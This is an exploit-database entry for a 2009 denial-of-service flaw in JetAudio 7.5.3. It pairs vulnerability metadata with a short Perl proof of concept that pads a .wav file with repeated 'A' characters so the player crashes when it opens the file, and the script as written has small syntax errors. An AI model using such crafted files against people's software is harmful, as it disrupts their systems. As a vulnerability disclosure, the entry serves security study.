JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit

vendor:

JetAudio

by:

prodigy

7,5

CVSS

HIGH

Denial of Service (DoS)

N/A

CWE

Product Name: JetAudio

Affected Version From: 7.5.3

Affected Version To: 7.5.3

Patch Exists: NO

Related CWE: N/A

CPE: a:jetaudio:jetaudio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit

JetAudio 7.5.3 COWON Media Center is vulnerable to a Denial of Service (DoS) attack when a specially crafted .WAV file is opened with the application. The application will crash when the file is opened, resulting in a DoS condition.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit
#
# Founded and exploited by prodigy
# 
# Vendor: JetAudio
#
# Usage to reproduce the bug: you need a file of recorded music in .wav,and then open it with JetAudio and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "c:\filerecorder.wav" #the file must be recorded with music

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-14]